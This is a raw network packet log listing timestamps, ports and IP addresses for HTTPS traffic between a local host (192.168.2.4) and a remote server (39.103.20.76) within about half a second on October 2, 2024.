Oct 2, 2024 04:27:36.587985992 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.588026047 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.588082075 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.588115931 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.588174105 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.588210106 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.588264942 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.588327885 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.588382959 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.596795082 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.624763966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.663182020 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.663306952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.663376093 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.663387060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.663420916 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.663439035 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.676341057 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.676412106 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.676675081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.676748037 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.676779032 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.676861048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.676877022 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.676940918 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.676974058 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677041054 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677063942 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677129984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677164078 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677226067 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677261114 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677325964 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677360058 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677429914 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677490950 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677555084 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677587986 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677643061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677680016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677736998 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677776098 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677844048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.677895069 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.677958012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.678299904 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.678363085 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.678471088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.678535938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.678654909 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.678716898 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.678831100 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.678894043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.678922892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.678981066 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679055929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679128885 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679169893 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679236889 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679260969 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679311991 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679368019 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679430008 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679578066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679641962 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679687977 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679753065 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679781914 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679841042 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.679914951 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.679980993 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.680013895 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.680080891 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.680114985 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.680175066 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.680201054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.680262089 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.754055023 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.754132986 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.754200935 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.754252911 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.765770912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.765810013 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.765832901 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.765844107 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.765855074 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.765889883 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.765891075 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.765921116 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.765928030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.765928030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.765933990 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.765949011 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.765978098 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.766037941 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.766092062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.766817093 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.766869068 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.766870975 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.766877890 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.766912937 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.766922951 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767019987 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767065048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767071962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767126083 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767168045 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767205954 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767211914 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767219067 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767251015 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767262936 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767534018 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767579079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767622948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767622948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.767632961 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.767674923 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769623041 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769661903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769681931 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769692898 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769704103 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769712925 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769732952 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769737959 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769751072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769764900 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769790888 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769793987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769807100 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769840002 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769849062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769855976 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769867897 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769885063 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769902945 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769912958 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769922018 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769931078 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769956112 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769958973 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769979954 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.769985914 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.769995928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770008087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770029068 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770050049 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770051003 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770061016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770068884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770092964 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770117998 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770123959 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770134926 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770134926 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770164967 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770169973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770179987 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770195007 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770221949 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770225048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770237923 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.770273924 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.770284891 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.843039036 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.845148087 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.845217943 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.845257998 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.845314026 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.856941938 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.857012987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.857039928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.857090950 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.857135057 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.857198954 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.857251883 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.857306957 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.857347012 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.857400894 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.857428074 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.857475042 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.857948065 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858000040 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.858042955 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858094931 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.858169079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858216047 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.858263016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858315945 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.858352900 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858406067 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.858450890 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858505964 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.858630896 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858688116 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.858764887 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.858822107 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.859983921 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860039949 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860084057 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860131025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860177994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860228062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860271931 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860332012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860366106 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860415936 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860466003 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860512972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860555887 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860613108 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860681057 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860732079 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860810041 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860857964 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860904932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.860955954 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.860989094 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.861042023 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.861073017 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.861124039 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.861169100 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.861218929 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.861263037 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.861314058 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.861355066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.861404896 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.936225891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.936294079 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.936352015 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.936408043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.947887897 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.947926044 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.947959900 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.947968960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.947984934 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948020935 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948067904 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948075056 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948107004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948134899 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948142052 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948198080 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948249102 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948295116 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948297024 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948295116 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948312998 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948357105 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948765039 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948822021 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.948905945 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.948946953 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.949012995 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.949068069 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.949125051 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.949176073 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.949181080 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.949189901 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.949230909 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.949332952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.949373960 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.949774027 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.949824095 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.949852943 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.949899912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951011896 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951066971 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951092005 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951117039 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951133013 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951141119 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951158047 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951179981 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951179981 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951189995 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951234102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951316118 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951354027 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951365948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951371908 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951419115 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951525927 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951562881 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951562881 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951569080 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951580048 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951626062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951632023 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951662064 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951674938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951679945 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951704979 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951730013 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951792002 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951821089 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951838017 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951843977 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951853991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951867104 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951874971 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951878071 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951905012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951926947 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951936007 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951967001 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.951986074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.951992989 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.952009916 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.952032089 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.952097893 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.952133894 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.952142954 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.952153921 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.952173948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.952188969 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.027225971 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.027323961 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.027352095 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.027357101 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.027398109 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.027420998 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039026022 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039067030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039092064 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039102077 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039107084 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039133072 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039154053 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039199114 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:37.039244890 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:37.039309025 CEST	443	49740	39.103.20.76	192.168.2.4
